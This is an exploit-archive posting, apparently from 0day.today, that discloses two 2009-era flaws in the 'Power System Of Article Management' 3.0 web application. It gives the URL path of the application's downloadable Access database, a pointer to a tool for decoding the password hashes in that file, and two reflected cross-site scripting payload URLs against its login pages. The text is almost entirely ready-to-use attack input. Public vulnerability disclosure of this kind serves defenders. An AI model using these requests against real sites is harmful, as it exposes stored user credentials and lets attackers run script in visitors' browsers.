id: 4798
date: 02/04/2009
title: Power System Of Article Management (DD/XSS) Vulnerabilities
author: Pouya_Server
cves: 

===========================================================
Power System Of Article Management (DD/XSS) Vulnerabilities
===========================================================


#########################################################
---------------------------------------------------------
Portal Name: Power System Of Article Management
Version : 3.0
Author : Pouya_Server 
Vulnerability : (DD/XSS)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/database/yiuwekdsodksldfslwifds.mdb
Hash Decoder :
http://pouya2006.persiangig.com/dec/PSOAMv3.html
or Google searching ...
 
[XSS]:
http://site.com/[Path]/userchklogin.asp?UserName=Pouya&Password=Pouya&CookieDate=0&ComeUrl=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&Submit=%C8%B7%C8%CF

http://site.com/[Path]/userlogin.asp?ComeUrl=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>
---------------------------------




#  0day.today [2023-03-24]  #